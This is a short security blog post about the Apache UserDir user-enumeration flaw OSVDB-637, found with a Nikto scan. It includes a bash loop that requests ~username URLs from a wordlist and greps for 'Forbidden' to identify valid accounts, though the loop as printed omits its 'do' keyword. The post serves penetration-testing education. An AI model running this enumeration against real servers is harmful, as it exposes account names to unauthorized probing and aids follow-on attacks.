Bash Script to Enumerate Users - OSVDB-637

I ran a Nikto scan and found the following vulnerability in the report that it produces:

"OSVDB-637: Enumeration of users is possible by requesting ~username (responds with 'Forbidden' for users, 'not found' for non-existent users)."

I then created the following bash script to run through a list of usernames to identify users that may exist:

while read line

     wget http://www.domain.local/~$line &> output/$line.output.file

done < names.list
grep -l -i 'forbidden' output/*

The last statement will then identify the files that are proceeded by a username that return indicating the user account exists on the particular apache server.

Below is the information about the vulnerability from the OSVDB database...
Apache web servers contain a flaw that may lead to an unauthorized information disclosure. The issue is triggered when the UserDir module is enabled and a remote attacker requests access to a user's home directory. By monitoring the web server response, an attacker is able to enumerate valid user names, resulting in a loss of confidentiality.


Popular posts from this blog

Netflix Streaming Blocked by Sophos UTM

BSides 2016 Hackers Challenge

VBA - Script to Download a file from a URL

IoT Malware Analysis - CnC Server - Part 3

vulnhub - Pandora's Box by c0ne Level 1 - Following walkthrough by strata